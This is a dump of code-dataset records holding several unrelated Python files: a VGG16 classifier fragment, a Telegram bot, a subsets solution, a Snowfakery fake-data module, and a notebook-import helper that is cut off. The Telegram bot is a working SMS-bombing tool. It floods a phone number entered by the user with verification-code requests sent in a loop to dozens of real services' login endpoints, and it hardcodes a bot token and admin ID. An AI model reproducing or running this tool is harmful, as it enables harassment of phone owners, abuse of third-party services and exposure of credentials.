__init__(self, imgs, weights=None, sess=None):\n self.imgs = imgs\n # self.convlayers()\n # self.fc_layers()\n f3 = vgg16_getv.convlayers()\n self.probs = tf.nn.softmax(f3)\n if weights is not None and sess is not None:\n vgg16_getv.load_weights_tf(weights, sess)\n\n def convlayers(self):\n # zero-mean input\n with tf.variable_scope('preprocess') as scope:\n mean = tf.constant([123.68, 116.779, 103.939], dtype=tf.float32, shape=[1, 1, 1, 3], name='img_mean')\n images = imgs - mean\n\n # conv1_1\n with tf.variable_scope('conv1_1') as scope:\n kernel = tf.get_variable(initializer=tf.truncated_normal([3, 3, 3, 64], dtype=tf.float32,\n stddev=1e-1), name='weights')\n conv = tf.nn.conv2d(images, kernel, [1, 1, 1, 1], padding='SAME')\n biases = tf.get_variable(initializer=tf.constant(0.0, shape=[64], dtype=tf.float32),\n trainable=True, name='biases')\n out = tf.nn.bias_add(conv, biases)\n conv1_1 = tf.nn.relu(out, name=scope.name)\n\n # conv1_2\n with tf.variable_scope('conv1_2') as scope:\n kernel = tf.get_variable(initializer=tf.truncated_normal([3, 3, 64, 64], dtype=tf.float32,\n stddev=1e-1), name='weights')\n conv = tf.nn.conv2d(conv1_1, kernel, [1, 1, 1, 1], padding='SAME')\n biases = tf.get_variable(initializer=tf.constant(0.0, shape=[64], dtype=tf.float32),\n trainable=True, name='biases')\n out = tf.nn.bias_add(conv, biases)\n conv1_2 = tf.nn.relu(out, name=scope.name)\n\n # pool1\n pool1 = tf.nn.max_pool(conv1_2,\n ksize=[1, 2, 2, 1],\n strides=[1, 2, 2, 1],\n padding='SAME',\n name='pool1')\n\n # conv2_1\n with tf.variable_scope('conv2_1') as scope:\n kernel = tf.get_variable(initializer=tf.truncated_normal([3, 3, 64, 128], dtype=tf.float32,\n stddev=1e-1), name='weights')\n conv = tf.nn.conv2d(pool1, kernel, [1, 1, 1, 1], padding='SAME')\n biases = tf.get_variable(initializer=tf.constant(0.0, shape=[128], dtype=tf.float32),\n trainable=True, name='biases')\n out = tf.nn.bias_add(conv, biases)\n conv2_1 = tf.nn.relu(out, name=scope.name)\n\n # conv2_2\n with tf.variable_scope('conv2_2') as scope:\n kernel = tf.get_variable(initializer=tf.truncated_normal([3, 3, 128, 128], dtype=tf.float32,\n stddev=1e-1), name='weights')\n conv = tf.nn.conv2d(conv2_1, kernel, [1, 1, 1, 1], padding='SAME')\n biases = tf.get_variable(initializer=tf.constant(0.0, shape=[128], dtype=tf.float32),\n trainable=True, name='biases')\n out = tf.nn.bias_add(conv, biases)\n conv2_2 = tf.nn.relu(out, name=scope.name)\n\n # pool2\n pool2 = tf.nn.max_pool(conv2_2,\n ksize=[1, 2, 2, 1],\n strides=[1, 2, 2, 1],\n padding='SAME',\n name='pool2')\n\n # conv3_1\n with tf.variable_scope('conv3_1') as scope:\n kernel = tf.get_variable(initializer=tf.truncated_normal([3, 3, 128, 256], dtype=tf.float32,\n stddev=1e-1), name='weights')\n conv = tf.nn.conv2d(pool2, kernel, [1, 1, 1, 1], padding='SAME')\n biases = tf.get_variable(initializer=tf.constant(0.0, shape=[256], dtype=tf.float32),\n trainable=True, name='biases')\n out = tf.nn.bias_add(conv, biases)\n conv3_1 = tf.nn.relu(out, name=scope.name)\n\n # conv3_2\n with tf.variable_scope('conv3_2') as scope:\n kernel = tf.get_variable(initializer=tf.truncated_normal([3, 3, 256, 256], dtype=tf.float32,\n stddev=1e-1), name='weights')\n conv = tf.nn.conv2d(conv3_1, kernel, [1, 1, 1, 1], padding='SAME')\n biases = tf.get_variable(initializer=tf.constant(0.0, shape=[256], dtype=tf.float32),\n trainable=True, name='biases')\n out = tf.nn.bias_add(conv, biases)\n conv3_2 = tf.nn.relu(out, name=scope.name)\n\n # conv3_3\n with tf.variable_scope('conv3_3') as scope:\n kernel = tf.get_variable(initializer=tf.truncated_normal([3, 3, 256, 256], dtype=tf.float32,\n stddev=1e-1), name='weights')\n conv = tf.nn.conv2d(conv3_2, kernel, [1, 1, 1, 1], padding='SAME')\n biases = tf.get_variable(initializer=tf.constant(0.0, shape=[256], dtype=tf.float32),\n trainable=True, name='biases')\n out = tf.nn.bias_add(conv, biases)\n conv3_3 = tf.nn.relu(out, name=scope.name)\n\n # pool3\n pool3 = tf.nn.max_pool(conv3_3,\n ksize=[1, 2, 2, 1],\n strides=[1, 2, 2, 1],\n padding='SAME',\n name='pool3')\n\n # conv4_1\n with tf.variable_scope('conv4_1') as scope:\n kernel = tf.get_variable(initializer=tf.truncated_normal([3, 3, 256, 512], dtype=tf.float32,\n stddev=1e-1), name='weights')\n conv = tf.nn.conv2d(pool3, kernel, [1, 1, 1, 1], padding='SAME')\n biases = tf.get_variable(initializer=tf.constant(0.0, shape=[512], dtype=tf.float32),\n trainable=True, name='biases')\n out = tf.nn.bias_add(conv, biases)\n conv4_1 = tf.nn.relu(out, name=scope.name)\n\n # conv4_2\n with tf.variable_scope('conv4_2') as scope:\n kernel = tf.get_variable(initializer=tf.truncated_normal([3, 3, 512, 512], dtype=tf.float32,\n stddev=1e-1), name='weights')\n conv = tf.nn.conv2d(conv4_1, kernel, [1, 1, 1, 1], padding='SAME')\n biases = tf.get_variable(initializer=tf.constant(0.0, shape=[512], dtype=tf.float32),\n trainable=True, name='biases')\n out = tf.nn.bias_add(conv, biases)\n conv4_2 = tf.nn.relu(out, name=scope.name)\n\n # conv4_3\n with tf.variable_scope('conv4_3') as scope:\n kernel = tf.get_variable(initializer=tf.truncated_normal([3, 3, 512, 512], dtype=tf.float32,\n stddev=1e-1), name='weights')\n conv = tf.nn.conv2d(conv4_2, kernel, [1, 1, 1, 1], padding='SAME')\n biases = tf.get_variable(initializer=tf.constant(0.0, shape=[512], dtype=tf.float32),\n trainable=True, name='biases')\n out = tf.nn.bias_add(conv, biases)\n conv4_3 = tf.nn.relu(out, name=scope.name)\n\n # pool4\n pool4 = tf.nn.max_pool(conv4_3,\n ksize=[1, 2, 2, 1],\n strides=[1, 2, 2, 1],\n padding='SAME',\n name='pool4')\n\n # conv5_1\n with tf.variable_scope('conv5_1') as scope:\n kernel = tf.get_variable(initializer=tf.truncated_normal([3, 3, 512, 512], dtype=tf.float32,\n stddev=1e-1), name='weights')\n conv = tf.nn.conv2d(pool4, kernel, [1, 1, 1, 1], padding='SAME')\n biases = tf.get_variable(initializer=tf.constant(0.0, shape=[512], dtype=tf.float32),\n trainable=True, name='biases')\n out = tf.nn.bias_add(conv, biases)\n conv5_1 = tf.nn.relu(out, name=scope.name)\n\n # conv5_2\n with tf.variable_scope('conv5_2') as scope:\n kernel = tf.get_variable(initializer=tf.truncated_normal([3, 3, 512, 512], dtype=tf.float32,\n stddev=1e-1), name='weights')\n conv = tf.nn.conv2d(conv5_1, kernel, [1, 1, 1, 1], padding='SAME')\n biases = tf.get_variable(initializer=tf.constant(0.0, shape=[512], dtype=tf.float32),\n trainable=True, name='biases')\n out = tf.nn.bias_add(conv, biases)\n conv5_2 = tf.nn.relu(out, name=scope.name)\n\n # conv5_3\n with tf.variable_scope('conv5_3') as scope:\n kernel = tf.get_variable(initializer=tf.truncated_normal([3, 3, 512, 512], dtype=tf.float32,\n stddev=1e-1), name='weights')\n conv = tf.nn.conv2d(conv5_2, kernel, [1, 1, 1, 1], padding='SAME')\n biases = tf.get_variable(initializer=tf.constant(0.0, shape=[512], dtype=tf.float32),\n trainable=True, name='biases')\n out = tf.nn.bias_add(conv, biases)\n conv5_3 = tf.nn.relu(out, name=scope.name)\n\n # pool5\n pool5 = tf.nn.max_pool(conv5_3,\n ksize=[1, 2, 2, 1],\n strides=[1, 2, 2, 1],\n padding='SAME',\n name='pool5')\n\n\n with tf.variable_scope('fc6'):\n shape = int(np.prod(pool5.get_shape()[1:]))\n fc1w = tf.get_variable(initializer=tf.truncated_normal([shape, 4096],\n dtype=tf.float32,\n stddev=1e-1), name='weights')\n fc1b = tf.get_variable(initializer=tf.constant(1.0, shape=[4096], dtype=tf.float32),\n trainable=True, name='biases')\n pool5_flat = tf.reshape(pool5, [-1, shape])\n fc1l = tf.nn.bias_add(tf.matmul(pool5_flat, fc1w), fc1b)\n fc1 = tf.nn.relu(fc1l)\n\n with tf.variable_scope('fc7'):\n fc2w = tf.get_variable(initializer=tf.truncated_normal([4096, 4096],\n dtype=tf.float32,\n stddev=1e-1), name='weights')\n fc2b = tf.get_variable(initializer=tf.constant(1.0, shape=[4096], dtype=tf.float32),\n trainable=True, name='biases')\n fc2l = tf.nn.bias_add(tf.matmul(fc1, fc2w), fc2b)\n fc2 = tf.nn.relu(fc2l)\n\n with tf.variable_scope('fc8'):\n fc3w = tf.get_variable(initializer=tf.truncated_normal([4096, 1000],\n dtype=tf.float32,\n stddev=1e-1), name='weights')\n fc3b = tf.get_variable(initializer=tf.constant(1.0, shape=[1000], dtype=tf.float32),\n trainable=True, name='biases')\n fc3l = tf.nn.bias_add(tf.matmul(fc2, fc3w), fc3b)\n\n return fc3l\n\n def load_weights_tf(self, weight_file, sess):\n weights = np.load(weight_file)\n keys = sorted(weights.keys())\n print(\"keys\", keys)\n for key in keys:\n x = str(key[:-2])\n with tf.variable_scope(key[:-2], reuse=True):\n if key[-1:] is \"W\":\n subkey = \"weights\"\n else:\n subkey = \"biases\"\n xxx = weights[key]\n print(\"k,np.shape\", key, np.shape(weights[key]))\n sess.run(tf.get_variable(subkey).assign(weights[key]))\n\n def load_weights_npy_tf(self, weight_file, sess):\n weights = np.load(weight_file, encoding='latin1').item()\n keys = sorted(weights.keys())\n print(\"keys\", keys)\n for i, k in enumerate(keys):\n for subkey in (0, 1):\n # xxx1 = weights[k][subkey]\n # xxx2 = weights[k][subkey]\n # print(\"xxx1.shape\", xxx1.shape)\n # print(\"xxx2.shape\", xxx2.shape)\n # print(\"i,k,subkey,np.shape\", j, k, subkey, np.shape(weights[k][subkey]))\n # sess.run(parameters[j].assign(weights[k][subkey]))\n sess.run(tf.get_variable(subkey).assign(weights[subkey]))\n # sess.run(parameters[j].assign(weights[k][subkey]))\n # j += 1\n\n\nif __name__ == '__main__':\n sess = tf.Session()\n imgs = tf.placeholder(tf.float32, [None, 224, 224, 3])\n vgg = vgg16_getv(imgs, './VGG16/vgg16_weights.npz', sess)\n # vgg = vgg16(imgs, './VGG16/vgg16.npy', sess)\n\n img1 = imread('./test_data/tiger.jpeg', mode='RGB')\n img1 = imresize(img1, (224, 224))\n\n prob = sess.run(vgg.probs, feed_dict={vgg.imgs: [img1]})[0]\n preds = (np.argsort(prob)[::-1])[0:5]\n for p in preds:\n print(class_names[p], prob[p])\n# down load websiet: https://www.cs.toronto.edu/~frossard/\n","sub_path":"KaggleLearn/DogVsCat/vgg16_getv.py","file_name":"vgg16_getv.py","file_ext":"py","file_size_in_byte":14665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"571947368","text":"import requests\nimport threading\nfrom datetime import datetime, timedelta\nfrom telebot import TeleBot\nimport telebot\nimport time\n\nTOKEN = '1057849061:AAG0idc99-x3xGa6wzOevqKqSaMSZ5VMhqw'\n\nTHREADS_LIMIT = 10000\n\nchat_ids_file = 'chat_ids.txt'\n\nADMIN_CHAT_ID = '344883715'\n\nusers_amount = [0]\nthreads = list()\nTHREADS_AMOUNT = [0]\ntypes = telebot.types\nbot = TeleBot(TOKEN)\nrunning_spams_per_chat_id = []\n\n\ndef save_chat_id(chat_id: object) -> object:\n chat_id = str(chat_id)\n with open(chat_ids_file, \"a+\") as ids_file:\n ids_file.seek(0)\n\n ids_list = [line.split('\\n')[0] for line in ids_file]\n\n if chat_id not in ids_list:\n ids_file.write(f'{chat_id}\\n')\n ids_list.append(chat_id)\n print(f'New chat_id saved: {chat_id}')\n else:\n print(f'chat_id {chat_id} is already saved')\n users_amount[0] = len(ids_list)\n return\n\n\ndef send_message_users(message):\n def send_message(chat_id):\n data = {\n 'chat_id': chat_id,\n 'text': message\n }\n response = requests.post(f'https://api.telegram.org/bot{TOKEN}/sendMessage', data=data)\n\n with open(chat_ids_file, \"r\") as ids_file:\n ids_list = [line.split('\\n')[0] for line in ids_file]\n\n [send_message(chat_id) for chat_id in ids_list]\n\n\n@bot.message_handler(commands=['start'])\ndef start(message):\n keyboard = types.ReplyKeyboardMarkup(row_width=2, resize_keyboard=True)\n boom = types.KeyboardButton(text='Start')\n stop = types.KeyboardButton(text='Stop')\n info = types.KeyboardButton(text='Info')\n\n buttons_to_add = [boom, stop, info]\n\n if int(message.chat.id) == ADMIN_CHAT_ID:\n buttons_to_add.append(types.KeyboardButton(text='Рассылка'))\n\n keyboard.add(*buttons_to_add)\n bot.send_message(message.chat.id, 'Привет, начнём?!', reply_markup=keyboard)\n save_chat_id(message.chat.id)\n\n\ndef start_spam(chat_id, phone_number, force):\n running_spams_per_chat_id.append(chat_id)\n\n if force:\n msg = f'Спам запущен на неограниченое время для номера +{phone_number}!'\n else:\n msg = f'Спам запущен на 5 минут на номер + {phone_number}!'\n\n bot.send_message(chat_id, msg)\n end = datetime.now() + timedelta(minutes=5)\n while (datetime.now() < end) or (force and chat_id == ADMIN_CHAT_ID):\n if chat_id not in running_spams_per_chat_id:\n break\n send_for_number(phone_number)\n bot.send_message(chat_id, f'Спам на номер {phone_number} завершён')\n THREADS_AMOUNT[0] -= 3\n try:\n running_spams_per_chat_id.remove(chat_id)\n except Exception:\n pass\n\n\ndef send_for_number(phone):\n request_timeout = 0.00001\n while True:\n requests.get('https://findclone.ru/register?phone=+' + phone, params={'phone': '+' + phone})\n requests.post('https://app.karusel.ru/api/v1/phone/', data={'phone': phone}, headers={})\n requests.post('https://api.sunlight.net/v3/customers/authorization/', data={'phone': phone})\n requests.post('https://lk.invitro.ru/lk2/lka/patient/refreshCode', data={'phone': phone})\n requests.post('https://online.sbis.ru/reg/service/', json={'jsonrpc': '2.0', 'protocol': '5', 'method': 'Пользователь.ЗаявкаНаФизика', 'params': {'phone': phone}, 'id': '1'})\n requests.post('https://myapi.beltelecom.by/api/v1/auth/check-phone?lang=ru', data={'phone': phone})\n requests.post('https://lenta.com/api/v1/authentication/requestValidationCode', json={'phone': '+' + phone})\n requests.post('https://mcdonalds.ru/api/auth/code', json={'phone': '+' + phone})\n requests.post('https://www.citilink.ru/registration/confirm/phone/+' + phone + '/')\n requests.post('https://rutube.ru/api/accounts/sendpass/phone', data={'phone': '+' + phone})\n requests.post('https://drugvokrug.ru/siteActions/processSms.htm', data={'cell': phone})\n requests.post('https://www.rabota.ru/remind', data={'credential': phone})\n requests.post('https://api.gotinder.com/v2/auth/sms/send?auth_type=sms&locale=ru', data={'phone_number': phone}, headers={})\n requests.post('https://belkacar.ru/get-confirmation-code', data={'phone': phone}, headers={})\n requests.post('https://p.grabtaxi.com/api/passenger/v2/profiles/register', data={'phoneNumber': phone, 'countryCode': 'ID', 'name': 'test', 'email': 'mail@mail.com', 'deviceToken': '*'}, headers={'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36'})\n requests.post('https://aitu.io/kz.btsd.messenger.auth.AuthService/SendCode', data={'phone': phone})\n requests.post('https://api-prime.anytime.global/api/v2/auth/sendVerificationCode', data={'phone': phone})\n requests.post('https://app.benzuber.ru/login', data={'phone': '+' + phone})\n requests.post('https://city24.ua/personalaccount/account/registration', data={'phone': phone})\n requests.post('https://dostavista.ru/backend/send-verification-sms', data={'phone': phone})\n requests.post('https://www.finam.ru/api/smslocker/sendcode', data={'phone': phone})\n requests.post('https://findclone.ru/register', data={'phone': '+' + phone})\n requests.post('https://helsi.me/api/healthy/accounts/login', data={'phone': phone})\n requests.post('https://ube.pmsm.org.ru/esb/iqos-phone/validate', data={'phone': phone})\n requests.post('https://ube.pmsm.org.ru/esb/iqos-phone/validate', data={'phone': phone})\n requests.post('https://app.karusel.ru/api/v1/phone/', data={'phone': phone})\n requests.post('https://app-api.kfc.ru/api/v1/common/auth/send-validation-sms', data={'phone': phone})\n requests.post('https://lenta.com/api/v1/authentication/requestValidationCode', data={'phone': phone})\n requests.post('https://www.monobank.com.ua/api/mobapplink/send', data={'phone': '+' + phone})\n requests.post('https://auth.multiplex.ua/login', data={'phone': phone})\n requests.post('https://account.my.games/signup_send_sms/', data={'phone': '+' + phone})\n requests.post('https://www.ozon.ru/api/composer-api.bx/_action/fastEntry', data={'phone': phone})\n requests.post('https://qlean.ru/clients-api/v2/sms_codes/auth/request_code', json={'phone': phone})\n requests.post('https://pass.rutube.ru/api/accounts/phone/send-password/', json={'phone': phone})\n requests.post('https://youla.ru/web-api/auth/request_code', data={'phone': phone})\n requests.post('https://app.sberfood.ru/api/mobile/v3/auth/sendSms', json={'phone': '+' + phone}, headers={\"AppKey\": \"WebApp-3a2605b0cf2a4c9d938752a84b7e97b6\"})\n requests.post('https://shopandshow.ru/sms/password-request/',data={\"phone\": \"+\" + phone, \"resend\": 0})\n requests.post('https://register.sipnet.ru/cgi-bin/exchange.dll/RegisterHelper', params={\"oper\": 9, \"callmode\": 1, \"phone\": \"+\" + phone})\n requests.post('https://smart.space/api/users/request_confirmation_code/', json={\"mobile\": \"+\" + phone, \"action\": \"confirm_mobile\"})\n requests.post('https://api.sunlight.net/v3/customers/authorization/', data={\"phone\": phone})\n requests.post('https://msk.tele2.ru/api/validation/number/\" + phone', json={\"sender\": \"Tele2\"})\n requests.post('https://api.tinkoff.ru/v1/sign_up', data={\"phone\": \"+\" + phone})\n requests.post('https://pay.visa.ru/api/Auth/code/request', json={\"phoneNumber\": \"+\" + phone})\n requests.post('https://shop.vsk.ru/ajax/auth/postSms/', data={\"phone\": phone})\n requests.post('https://api.iconjob.co/api/auth/verification_code', json={\"phone\": phone})\n requests.post('https://api.wowworks.ru/v2/site/send-code', json={\"phone\": phone, \"type\": 2})\n requests.post('https://api.chef.yandex/api/v2/auth/sms', json={\"phone\": phone})\n requests.post('https://eda.yandex/api/v1/user/request_authentication_code', json={\"phone_number\": \"+\" + phone})\n requests.post('https://lenta.com/api/v1/authentication/requestValidationCode', json={\"phone\": \"+\" + phone})\n requests.post('https://api.kinoland.com.ua/api/v1/service/send-sms', headers={\"Agent\": \"website\"},json={\"Phone\": phone, \"Type\": 1})\n requests.post('https://guru.taxi/api/v1/driver/session/verify', json={\"phone\": {\"code\": 1, \"number\": phone}})\n\ndef spam_handler(phone, chat_id, force):\n if int(chat_id) in running_spams_per_chat_id:\n bot.send_message(chat_id, '!Вы уже начали рассылку спама.')\n return\n\n if THREADS_AMOUNT[0] < THREADS_LIMIT:\n x = threading.Thread(target=start_spam, args=(chat_id, phone, force))\n threads.append(x)\n THREADS_AMOUNT[0] += 1\n x.start()\n else:\n bot.send_message(chat_id, '!Сервера сейчас перегружены. Попытайтесь снова через несколько минут!')\n print('Максимальное количество тредов исполняется. Действие отменено.!')\n\n\n@bot.message_handler(content_types=['text'])\ndef handle_message_received(message):\n chat_id = int(message.chat.id)\n text = message.text\n\n if text == 'Start':\n bot.send_message(chat_id, 'Введите номер без + в формате:\\n🇷🇺 79xxxxxxxxx')\n\n elif text == 'Рассылка' and chat_id == ADMIN_CHAT_ID:\n bot.send_message(chat_id, 'Введите сообщение в формате: \"отправка: ваш_текст\" без кавычек')\n elif text == 'Info':\n bot.send_message(chat_id, 'По всем вопросам можете писать мне в лс:\\n @ogpr1nce')\n\n elif text == 'Stop':\n if chat_id not in running_spams_per_chat_id:\n bot.send_message(chat_id, 'Вы еще не начинали атаку')\n else:\n running_spams_per_chat_id.remove(chat_id)\n\n elif 'отправка: ' in text and chat_id == ADMIN_CHAT_ID:\n msg = text.replace(\"отправка: \", \"\")\n send_message_users(msg)\n\n elif len(text) == 11:\n phone = text\n spam_handler(phone, chat_id, force=False)\n\n elif len(text) == 12:\n phone = text\n spam_handler(phone, chat_id, force=False)\n\n elif len(text) == 12 and chat_id == ADMIN_CHAT_ID and text[0] == '_':\n phone = text[1:]\n spam_handler(phone, chat_id, force=True)\n\n else:\n bot.send_message(chat_id, f'Номер введен неправильно. Введено {len(text)} символов, ожидается 11')\n print(f'Номер введен неправильно. Введено {len(text)} символов, ожидается 11')\n\n\nif __name__ == '__main__':\n bot.polling(none_stop=True)\n","sub_path":"VuHj5eGq.py","file_name":"VuHj5eGq.py","file_ext":"py","file_size_in_byte":10899,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"132422350","text":"class Solution(object):\n def subsets(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: List[List[int]]\n \"\"\"\n if not nums: return [[]]\n res_subsets = self.subsets(nums[1:])\n return res_subsets + [[nums[0]] + i for i in res_subsets]\n\n def subsetsWithDup(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: List[List[int]]\n \"\"\"\n sets = self.subsets(nums)\n sets = [sorted(i) for i in sets]\n ans = []\n for i in sets:\n if i not in ans:\n ans.append(i)\n return ans\n","sub_path":"code/90. Subsets II.py","file_name":"90. Subsets II.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"232148917","text":"from difflib import get_close_matches\nimport typing as T\nimport random\nfrom snowfakery.plugins import PluginContext\nfrom itertools import product\nfrom datetime import datetime\n\nfrom faker import Faker, Generator\n\n# .format language doesn't allow slicing. :(\nfirst_name_patterns = (\"{firstname}\", \"{firstname[0]}\", \"{firstname[0]}{firstname[1]}\")\nfirst_name_separators = (\"\", \".\", \"-\", \"_\", \"+\")\nyear_patterns = (\"{year}\", \"{year[2]}{year[3]}\", \"{year[3]}\", \"\")\n\nemail_templates = [\n f\"{first_name}{first_name_separator}{{lastname}}{year}@{{domain}}\"\n for first_name, first_name_separator, year in product(\n first_name_patterns, first_name_separators, year_patterns\n )\n]\n\nthis_year = datetime.today().year\n\n\nclass FakeNames(T.NamedTuple):\n f: Faker\n faker_context: PluginContext = None\n\n # \"matching\" allows us to turn off the behaviour of\n # trying to incorporate one field into another if we\n # need to.\n def user_name(self, matching: bool = True):\n \"Salesforce-style username in the form of an email address\"\n already_created = self._already_have((\"firstname\", \"lastname\"))\n if matching and all(already_created):\n return f\"{already_created[0]}.{already_created[1]}_{self.f.uuid4()}@{self.f.safe_domain_name()}\"\n return f\"{self.f.first_name()}_{self.f.last_name()}_{self.f.uuid4()}@{self.f.hostname()}\"\n\n def alias(self):\n \"\"\"Salesforce-style 8-character alias: really an 8 char-truncated firstname.\n Not necessarily unique, but likely to be unique if you create small\n numbers of them.\"\"\"\n return self.f.first_name()[0:8]\n\n def email(self, matching: bool = True):\n \"\"\"Email address using one of the \"example\" domains\"\"\"\n already_created = self._already_have((\"firstname\", \"lastname\"))\n if matching and all(already_created):\n template = random.choice(email_templates)\n\n return template.format(\n firstname=already_created[0].ljust(2, \"_\"),\n lastname=already_created[1],\n domain=self.f.safe_domain_name(),\n year=str(random.randint(this_year - 80, this_year - 10)),\n )\n return self.f.ascii_safe_email()\n\n def realistic_maybe_real_email(self):\n \"\"\"Like fake: email except that the email domain may be real and therefore\n the email address itself may be real. Use with caution, you might\n accidentally email strangers!!!\n \"\"\"\n return self.f.email()\n\n def _already_have(self, names: T.Sequence[str]):\n \"\"\"Get a list of field values that we've already generated\"\"\"\n already_created = self.faker_context.local_vars()\n vals = [already_created.get(name) for name in names]\n return vals\n\n def state(self):\n \"\"\"Return a state, province or other appropriate administrative unit\"\"\"\n return self.f.administrative_unit()\n\n def postalcode(self):\n \"\"\"Return whatever counts as a postalcode for a particular locale\"\"\"\n return self.f.postcode()\n\n\n# we will use this to exclude Faker's internal book-keeping methods\n# from our faker interface\nfaker_class_attrs = set(dir(Faker)).union((dir(Generator)))\n\n\nclass FakeData:\n \"\"\"Wrapper for Faker which adds Salesforce names and case insensitivity.\"\"\"\n\n def __init__(\n self,\n faker_providers: T.Sequence[object],\n locale: str = None,\n faker_context: PluginContext = None,\n ):\n # access to persistent state\n self.faker_context = faker_context\n\n faker = Faker(locale, use_weighting=False)\n for provider in faker_providers:\n faker.add_provider(provider)\n\n fake_names = FakeNames(faker, faker_context)\n\n def no_underscore_name(name):\n return name.lower().replace(\"_\", \"\")\n\n def obj_to_func_list(obj: object, canonicalizer: T.Callable, ignore_list: set):\n return {\n canonicalizer(name): getattr(obj, name)\n for name in dir(obj)\n if not name.startswith(\"_\") and name not in ignore_list\n }\n\n # canonical form of names is lower-case, no underscores\n # include faker names with underscores in case of ab_c/a_bc clashes\n # include faker names with no underscores to emulate salesforce\n # include snowfakery names defined above\n self.fake_names = {\n **obj_to_func_list(faker, str.lower, faker_class_attrs),\n **obj_to_func_list(faker, no_underscore_name, faker_class_attrs),\n # in case of conflict, snowfakery names \"win\" over Faker names\n **obj_to_func_list(fake_names, str.lower, set()),\n **obj_to_func_list(fake_names, no_underscore_name, set()),\n }\n\n def _get_fake_data(self, origname, *args, **kwargs):\n local_faker_vars = self.faker_context.local_vars()\n\n # faker names are all lower-case\n name = origname.lower()\n\n meth = self.fake_names.get(name)\n\n if meth:\n ret = meth(*args, **kwargs)\n local_faker_vars[name.replace(\"_\", \"\")] = ret\n return ret\n\n msg = f\"No fake data type named {origname}.\"\n match_list = get_close_matches(name, self.fake_names.keys(), n=1)\n if match_list:\n msg += f\" Did you mean {match_list[0]}\"\n raise AttributeError(msg)\n","sub_path":"snowfakery/fakedata/fake_data_generator.py","file_name":"fake_data_generator.py","file_ext":"py","file_size_in_byte":5379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"98369300","text":"\n# -*- coding: utf-8 -*-\n\n# .ipynbをimportする\n\n# 使用例1:\n# import ipynb_import_lib\n# ipynb_import_lib.import_ipynb(\"./sample_lib.ipynb\", \"lib1\")\n# lib1.any_func1(...) # 呼び出し等\n\n# 使用例2:\n# import ipynb_import_lib\n# lib1 = ipynb_import_lib.import_ipynb(\"./sample_lib.ipynb\")\n# lib1.any_func1(...) # 呼び出し等\n\nimport json, ast, re\nimport pathlib, sys\n\ndef main(): # 実行切替用\n pass\n\n# sec: .ipynbをimport\n\n# .ipynbファイルのpyコードをimport (import用の.py生成)\ndef import_ipynb(path_nb, # .ipynbのパス\n name=None, no_expr=True, # .pyファイル名, 計算式は除外\n if_import=True, must_import=False): # importしてglobalsに登録, 既存でも再import\n\n # sec: パス解決\n\n if not isinstance(path_nb, pathlib.Path):\n path_nb = pathlib.Path(path_nb)\n\n if name is None: # if: .ipynbと同名\n name = path_nb.stem\n\n path_py = path_nb.parent.joinpath(\"__pycache__\", name + \".py\")\n\n # sec: .ipynbファイル内容の更新有無\n\n if not path_py.exists() or \\\n path_nb.stat().st_mtime > path_py.stat().st_mtime: # if: 更新あり\n\n # sec: .py生成\n\n text_code = get_code_from_ipynb(path_nb, no_expr)\n\n path_py.parent.mkdir(exist_ok=True) # __pycache__フォルダ作成\n\n with open(path_py, 'w', encoding='UTF8') as file:\n file.write(text_code)\n\n # sec: import\n\n if not if_import: # if: .py生成のみ\n return\n\n pygl = globals() # global域の変数\n if not must_import and name in pygl: # if: 既存 既にimport済み\n return pygl[name]\n\n else:\n sys.path.append(str(path_py.parent)) # __pycache__フォルダへのパス tag:CACH\n\n imported = __import__(name) # 注意: \"abc.def\"など下位を読み込めない\n # imported = importlib.import_module(name) # __import__で代用可 importlib要らず\n\n sys.path.remove(str(path_py.parent)) # 解除 tag:CACH\n\n pygl[name] = imported\n return imported\n\ndef test__import_ipynb():\n # 結果:\n # <module 'tut1' from '__pycache__\\\\tut1.py'>\n # <module 'tut1' from '__pycache__\\\\tut1.py'>\n # <class 'tut1.DQN'>\n # <module 'official-tut reinforcement_q_learning' from '__pycache__\\\\official-tut reinforcement_q_learning.py'>\n # <class 'official-tut reinforcement_q_learning.DQN'>\n\n PATH_NB = \"./official-tut reinforcement_q_learning.ipynb\"\n import_ipynb(PATH_NB, \"tut1\")\n print(tut1)\n import_ipynb(PATH_NB, \"tut1\") # 2回目\n print(tut1)\n print(tut1.DQN)\n\n tut2 = import_ipynb(PATH_NB)\n print(tut2)\n print(tut2.DQN)\n# main = test__import_ipynb\n\n# .ipynbファイルからpyコード(文字列)を取得\ndef get_code_from_ipynb(path_nb, # .ipynbのパス\n no_expr=True): # グローバル域に定義された計算式は除外\n # 非対応: \"\"\"~多行~\"\"\"の文字列はコメントアウト不可\n\n # sec: load\n\n with open(path_nb, 'rb') as file:\n json_root = json.load(file)\n\n # sec: code cell\n\n re_ipy = re.compile(r\"(^%|^!)\", re.MULTILINE)\n text_code = \"\"\n for elem_i in json_root[\"cells\"]:\n\n if elem_i[\"cell_type\"] != \"code\":\n continue\n\n text = \"\".join(elem_i[\"source\"])\n text = re_ipy.sub(\"# NOT-PY: \\\\1\", text)\n\n text_code += \"\\n# ---------- cell ----------\\n\\n\" + text + \"\\n\"\n\n # print(text_code)\n\n if not no_expr: # if: コードそのまま\n return text_code\n\n # sec: AST\n\n text_code += \"\\npass\" # HACK: 最終行の検出用に空要素を追加\n\n tree_root = ast.parse(text_code)\n\n # sec: 計算式\n\n i_curr = None\n node_curr = None\n expr_list = [] # グローバル域に定義された計算式範囲 [(i_from, i_to), ...]\n for node_i in ast.iter_child_nodes(tree_root):\n\n i_next = get_lineno(node_i) # 1つ前の要素の行番号範囲を決める\n if i_curr is not None: # if: 初回以外\n\n if node_curr.__class__.__name__ not in (\n \"Import, ImportFrom, FunctionDef, ClassDef\"):\n\n expr_list.append((i_curr, i_next - 1))\n\n i_curr, node_curr = i_next, node_i\n\n # HACK: 追加したpassは既に除去済み 1つ前の要素の為\n\n # print(expr_list)\n\n # sec: コードを行で分割\n\n re_line = re.compile(r\"\\r?\\n\")\n lines = re_line.split(text_code)\n lines = lines[:-1] # HACK: 